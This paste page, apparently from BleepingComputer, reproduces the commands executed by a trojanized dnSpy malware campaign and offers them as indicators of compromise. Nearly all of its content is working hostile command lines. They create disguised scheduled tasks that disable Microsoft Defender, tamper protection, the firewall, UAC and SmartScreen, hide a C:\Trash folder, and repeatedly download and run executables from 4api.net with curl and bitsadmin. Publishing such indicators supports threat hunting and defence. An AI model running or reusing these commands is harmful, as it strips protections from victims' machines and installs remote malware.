BleepingComputer

Untitled

Jan 8th, 2022 (edited)
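  1. Commands executed by the trojanized dnSpy campaign, extracted by https://twitter.com/malwrhunterteam. Entries 1-16 are schtasks command lines whose scheduled tasks, named under Microsoft\Windows\DirectX\, turn off Microsoft Defender settings and services, the firewall and UAC, and repeatedly fetch and run executables from 4api.net in C:\Trash; entries 17-18 are PowerShell registry writes to the UAC prompt policy. The task names, registry values, host and directory are the indicators to hunt for.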
  2.  
  3. 1.
  4. @"schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force Sc"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force Re"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 01"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 02"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 03"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 04"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 05"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore',0)(Window.Close)"""
  5.  
  6. 2.
  7.  
  8. @"schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 06"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 07"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 08"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 09"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 10"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 11"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 12"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -HighThreatDefaultAction 6 -Force -ErrorAction Ignore',0)(Window.Close)"""
  9.  
  10. 3.
  11.  
  12. @"schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 13"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -ModerateThreatDefaultAction 6 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 14"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -LowThreatDefaultAction 6 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 15"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -SevereThreatDefaultAction 6 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 16"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionExtension .exe -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 17"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionExtension exe -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 18"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess cmd.exe -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 19"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess powershell.exe -Force',0)(Window.Close)"""
  13.  
  14. 4.
  15.  
  16. @"schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Force 20"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess mshta.exe -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Force 21"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess *.exe -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Force 22"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionPath C:\* -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 01"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender\Features'' /v TamperProtection /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 02"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender'' /v DisableAntiSpyware /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 03"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender'' /v DisableAntiVirus /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 04"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine'' /v MpEnablePus /t REG_DWORD /d 0 /f',0)(Window.Close)"""
  17.  
  18. 5.
  19.  
  20.  
  21. @"schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 05"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 06"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableIOAVProtection /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 07"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableOnAccessProtection /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 08"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 09"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 10"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Reporting'' /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 
11"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet'' /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f',0)(Window.Close)"""
  22.  
  23.  
  24. 6.
  25.  
  26. @"schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 12"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet'' /v SpynetReporting /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 13"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet'' /v SubmitSamplesConsent /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 14"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 15"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 16"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v ''Windows Defender'' /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 17"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ''Windows Defender'' /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 18"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 
WindowsDefender /f',0)(Window.Close)"""
  27.  
  28.  
  29. 7.
  30.  
  31. @"schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 19"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCR\*\shellex\ContextMenuHandlers\EPP /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 20"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 21"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 22"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 23"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 24"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 25"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"""
  32.  
  33. 8.
  34.  
  35. @"schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 26"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 27"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 28"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 29"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 30"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 31"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 32"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"""
  36.  
  37. 9.
  38.  
  39. @"schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 33"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection'' /v DpaDisabled /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 34"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add ''HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer'' /v SmartScreenEnabled /t REG_SZ /d Off /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 35"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet'' /v DontReportInfectionInformation /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 36"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SYSTEM\CurrentControlSet\Services\Sense /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 37"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformatio /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 38"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 39"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f',0)(Window.Close)"""
  40.  
  41. 10.
  42.  
  43. @"schtasks /create /f /sc minute /mo 30 /rl highest /tn ""Microsoft\Windows\DirectX\Services 40"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 30 /rl highest /tn ""Microsoft\Windows\DirectX\Services 41"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance /v Enabled /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 30 /rl highest /tn ""Microsoft\Windows\DirectX\Services 42"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService /f',0)(Window.Close)"""
  44.  
  45. 11.
  46.  
  47. @"schtasks /create /f /sc minute /mo 31 /rl highest /tn ""Microsoft\Windows\DirectX\Services FW"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c netsh advfirewall set allprofiles state off',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 31 /rl highest /tn ""Microsoft\Windows\DirectX\Services UAC"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 31 /rl highest /tn ""Microsoft\Windows\DirectX\Services CURL"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer CURL http://4api.net/curl.exe %windir%\system32\curl.exe',0)(Window.Close)"" & schtasks /create /f /sc ONLOGON /rl highest /tn ""Microsoft\Windows\DirectX\Services CCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c timeout 150 & curl http://4api.net/c.exe -o C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"" & schtasks /create /f /sc ONLOGON /rl highest /tn ""Microsoft\Windows\DirectX\Services BCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c timeout 300 & bitsadmin /transfer BCore http://4api.net/c.exe C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"""
  48.  
  49. 12.
  50.  
  51. @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/c.exe -o C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BCore http://4api.net/c.exe C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CCK"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/ck.exe -o C:\Trash\ck.exe & C:\Trash\ck.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BCK"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/ck.exe C:\Trash\ck.exe & C:\Trash\ck.exe',0)(Window.Close)"""
  52.  
  53. 13.
  54.  
  55. @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CBTC"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/cbot.exe -o C:\Trash\cbot.exe & C:\Trash\cbot.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BBTC"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/cbot.exe C:\Trash\cbot.exe & C:\Trash\cbot.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CBot"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/cbo.exe -o C:\Trash\cbo.exe & C:\Trash\cbo.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BBot"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/cbo.exe C:\Trash\cbo.exe & C:\Trash\cbo.exe',0)(Window.Close)"""
  56.  
  57. 14.
  58.  
  59. @"schtasks /create /f /sc minute /mo 300 /tn ""Microsoft\Windows\DirectX\Services MN"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/m.exe -o C:\Trash\m.exe & C:\Trash\m.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /tn ""Microsoft\Windows\DirectX\Services MN"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/m.exe C:\Trash\m.exe & C:\Trash\m.exe',0)(Window.Close)"""
  60.  
  61. 15.
  62.  
  63. @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CAV"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/d.exe -o C:\Trash\d.exe & C:\Trash\d.exe -d',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BAV"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/d.exe C:\Trash\d.exe & C:\Trash\d.exe -d',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Services Dir"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c mkdir c:\Trash & attrib +h C:\Trash & attrib +h C:\Trash\*.* & exit',0)(Window.Close)"""
  64.  
  65. 16.
  66.  
  67. @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CNJ"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/nnj.exe -o C:\Trash\nnj.exe & C:\Trash\nnj.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BNJ"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/nnj.exe C:\Trash\nnj.exe & C:\Trash\nnj.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CQS"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/qs.exe -o C:\Trash\qs.exe & C:\Trash\qs.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BQS"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/qs.exe C:\Trash\qs.exe & C:\Trash\qs.exe',0)(Window.Close)"""
  68.  
  69. 17.
  70.  
  71. @"Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0"
  72.  
  73. 18.
  74.  
  75. @"Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0"
  76.  
  77.  